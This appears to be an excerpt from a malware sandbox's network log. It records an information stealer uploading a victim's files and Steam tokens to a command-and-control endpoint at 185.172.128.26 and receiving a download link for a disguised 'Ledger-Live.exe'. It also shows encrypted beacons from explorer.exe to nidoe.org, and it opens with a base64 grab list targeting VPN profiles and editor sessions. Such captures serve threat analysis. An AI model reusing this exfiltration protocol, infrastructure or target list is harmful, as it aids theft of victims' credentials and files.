QREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU
Mar 28, 2024 09:15:44.517328024 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHID Host: 185.172.128.26 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:45.442569017 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:45.576457977 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFH Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:46.170933962 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:46.215049028 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGH Host: 185.172.128.26 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:46.944412947 CET	1286	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGH Host: 185.172.128.26 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 52 45 56 54 53 31 78 61 55 31 4e 61 57 55 56 47 57 55 31 56 58 46 70 54 55 31 70 5a 52 55 5a 5a 54 56 55 75 5a 47 39 6a 65 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 57 6c 4e 54 57 6c 6c 46 52 6c 6c 4e 56 56 46 46 53 31 70 57 55 46 46 43 54 56 4e 48 57 6c 42 48 52 6b 70 54 56 46 42 57 53 31 4e 4c 53 31 6c 5a 54 30 70 4b 53 56 5a 4c 53 6c 4a 59 54 55 4a 45 51 30 31 4c 51 6b 35 54 57 45 56 61 54 31 6c 5a 54 45 78 44 56 6b 64 43 51 31 46 44 53 31 5a 56 55 31 68 49 54 46 52 55 54 46 4a 43 53 46 42 44 54 6c 4e 46 54 56 4a 53 54 30 74 43 57 45 5a 48 55 55 70 61 56 45 4a 42 56 6b 35 53 53 6b 70 52 51 6b 74 58 55 56 6c 58 53 55 35 56 56 45 52 58 57 46 56 4c 56 46 64 52 56 45 78 47 56 6b 74 52 53 6b 78 53 57 46 5a 47 54 55 4e 50 57 6c 4a 61 57 56 46 4b 53 30 4a 4a 56 46 70 50 54 6c 42 54 53 31 5a 47 57 55 64 57 52 6c 4a 59 51 6b 52 50 56 6c 6c 49 56 6b 56 4e 51 56 46 50 52 56 6c 4e 53 30 68 48 52 6b 6c 56 55 30 31 56 57 6b 5a 4d 53 31 4a 4c 51 6b 35 5a 52 6c 46 56 54 46 6c 42 55 31 46 4b 56 30 6c 4e 57 46 52 51 53 30 78 55 57 45 35 48 53 6b 56 58 54 56 5a 54 52 45 31 57 57 55 56 49 54 55 52 51 56 55 4a 58 53 46 68 4d 54 55 52 48 51 55 78 4a 56 45 5a 5a 54 31 42 4f 52 55 6c 52 55 31 70 4a 52 6c 52 52 56 6c 56 54 54 46 4a 4d 57 56 42 4c 55 6c 52 59 54 6b 74 51 57 6b 31 50 56 46 4e 47 54 55 4e 55 56 45 4e 42 55 6b 52 5a 56 46 5a 5a 53 6b 35 61 57 55 4a 5a 51 31 6c 47 52 55 31 58 56 30 74 44 53 45 31 50 56 45 56 61 56 56 52 44 55 6b 56 43 57 6c 42 4e 56 6b 4e 59 51 6c 6c 51 57 55 46 4f 52 56 4a 4e 52 30 6c 58 55 55 64 53 54 45 52 51 55 6b 70 46 56 56 4a 4a 56 46 4a 4a 53 45 56 55 54 56 6c 49 52 55 52 53 53 46 5a 61 56 30 4e 4e 52 45 68 4f 52 6b 5a 61 52 30 78 4c 53 30 70 52 52 30 4e 53 53 55 46 43 56 46 5a 50 54 31 4e 44 54 56 4a 45 54 55 4e 5a 51 6b 31 45 55 55 39 48 53 46 56 56 57 6b 6c 52 56 55 52 4a 52 31 64 4b 52 55 52 5a 55 30 6c 4d 51 55 78 52 51 6b 39 43 53 45 70 44 53 6c 68 4e 57 55 4e 59 56 30 31 4c 56 31 52 42 57 6c 52 42 56 56 70 48 51 30 39 50 57 56 52 43 56 30 68 57 55 30 46 4e 56 55 64 46 54 55 74 57 53 45 35 48 56 31 6c 53 54 31 5a 42 52 56 64 59 53 55 39 4b 53 30 35 56 56 55 46 49 56 56 70 4b 53 31 4e 43 53 6b 4a 61 53 46 6c 51 55 6b 31 48 57 46 56 4d 55 6b 35 4c 51 30 56 45 57 6b 4a 61 52 6c 4e 44 54 45 4e 4d 51 56 4a 52 52 45 70 4e 54 46 42 56 53 30 52 54 56 56 64 56 53 56 70 4e 56 55 52 4a 53 Data Ascii: ------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS1xaU1NaWUVGWU1VXFpTU1pZRUZZTVUuZG9jeA==------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="file"WlNTWllFRllNVVFFS1pWUFFCTVNHWlBHRkpTVFBWS1NLS1lZT0pKSVZLSlJYTUJEQ01LQk5TWEVaT1lZTExDVkdCQ1FDS1ZVU1hITFRUTFJCSFBDTlNFTVJST0tCWEZHUUpaVEJBVk5SSkpRQktXUVlXSU5VVERXWFVLVFdRVExGVktRSkxSWFZGTUNPWlJaWVFKS0JJVFpPTlBTS1ZGWUdWRlJYQkRPVllIVkVNQVFPRVlNS0hHRklVU01VWkZMS1JLQk5ZRlFVTFlBU1FKV0lNWFRQS0xUWE5HSkVXTVZTRE1WWUVITURQVUJXSFhMTURHQUxJVEZZT1BORUlRU1pJRlRRVlVTTFJMWVBLUlRYTktQWk1PVFNGTUNUVENBUkRZVFZZSk5aWUJZQ1lGRU1XV0tDSE1PVEVaVVRDUkVCWlBNVkNYQllQWUFORVJNR0lXUUdSTERQUkpFVVJJVFJJSEVUTVlIRURSSFZaV0NNREhORkZaR0xLS0pRR0NSSUFCVFZPT1NDTVJETUNZQk1EUU9HSFVVWklRVURJR1dKRURZU0lMQUxRQk9CSEpDSlhNWUNYV01LV1RBWlRBVVpHQ09PWVRCV0hWU0FNVUdFTUtWSE5HV1lST1ZBRVdYSU9KS05VVUFIVVpKS1NCSkJaSFlQUk1HWFVMUk5LQ0VEWkJaRlNDTENMQVJRREpNTFBVS0RTVVdVSVpNVURJS
Mar 28, 2024 09:15:47.555823088 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:47.675637007 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:48.764925957 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:48.828411102 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDAFIEHIEGDHIDGDGHDH Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:49.505847931 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:49.522094011 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHD Host: 185.172.128.26 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:50.538965940 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:50.679394007 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:51.439313889 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:51.445478916 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDH Host: 185.172.128.26 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:52.284863949 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:52.331134081 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJ Host: 185.172.128.26 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:53.080663919 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:53.087661982 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFH Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:53.797964096 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:53.803041935 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIIEGIDHCBFIDHJDGDB Host: 185.172.128.26 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:54.422740936 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:54.454967022 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBA Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:55.974292994 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:55.984190941 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFH Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:58.277002096 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:58.783670902 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHI Host: 185.172.128.26 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:59.741218090 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:59.820147038 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIII Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:00.607048035 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:00.699261904 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKKKFIIJJKJKFIECBF Host: 185.172.128.26 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:01.374164104 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:01.429254055 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIID Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:02.126176119 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:02.228032112 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBF Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:02.931900978 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:02.989236116 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIEHDAFHDHCBFIDGCFID Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:03.588289022 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:03.618597984 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJK Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:04.215126991 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:04.324367046 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:04.917217970 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:04.941068888 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHC Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:05.755981922 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:05.830936909 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAAECGHCBGCBFHIIDHI Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:06.480192900 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:06.518168926 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAF Host: 185.172.128.26 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:07.146255016 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:07.206960917 CET	564	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDB Host: 185.172.128.26 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="file"------KKJDGDHIDBGIECBGHJDB--
Mar 28, 2024 09:16:09.709763050 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:09.944299936 CET	204	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHC Host: 185.172.128.26 Content-Length: 112059 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:16:12.176657915 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:16:12.297594070 CET	468	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB Host: 185.172.128.26 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 65 67 77 65 67 67 77 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 2d 2d 0d 0a Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="message"egweggw------IDAKJKEHDBGHIDHIEHDB--
Mar 28, 2024 09:16:12.895265102 CET	231	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:16:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 60 Connection: keep-alive Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 59 31 4c 30 78 6c 5a 47 64 6c 63 69 31 4d 61 58 5a 6c 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 41 3d 3d Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjY1L0xlZGdlci1MaXZlLmV4ZXwwfDB8fA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49862	37.255.238.137	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:16:08.203210115 CET	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ndvkyttxqwhxxf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 111 Host: nidoe.org
Mar 28, 2024 09:16:08.203248024 CET	111	OUT	Data Raw: 3b 6e 59 15 f7 bc 6e 54 d6 de c6 06 73 75 7e cb 7b 0f cd ec 1d 71 e2 16 01 75 79 9d 46 b1 c5 6a ed 2d ce 5a 0f 19 56 1b 9a 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 1f e6 94 Data Ascii: ;nYnTsu~{quyFj-ZV? 9Yt M@NA .[k,vuH1pX@V**L6@]
Mar 28, 2024 09:16:09.187184095 CET	252	IN	HTTP/1.0 404 Not Found Date: Thu, 28 Mar 2024 08:16:08 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 83 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49864	37.255.238.137	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:16:09.470216990 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://abgkgapmosblami.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 314 Host: nidoe.org
Mar 28, 2024 09:16:09.470236063 CET	314	OUT	Data Raw: 3b 6e 59 15 f7 bc 6e 54 d6 de c6 06 73 75 7e cb 7b 0f cd ec 1d 71 e2 16 01 75 79 9d 46 b1 c5 6a ed 2d ce 5a 0f 19 56 1b 9a 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 42 14 ae ab Data Ascii: ;nYnTsu~{quyFj-ZV? 9Yt M@NA -[k,vuB^qEm5qF(E7<DFwoo2-&N4&P}2\*:f^Z(BQQg2qg\|3p.QtrD
Mar 28, 2024 09:16:10.019511938 CET	587	IN	HTTP/1.0 404 Not Found Date: Thu, 28 Mar 2024 08:16:09 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 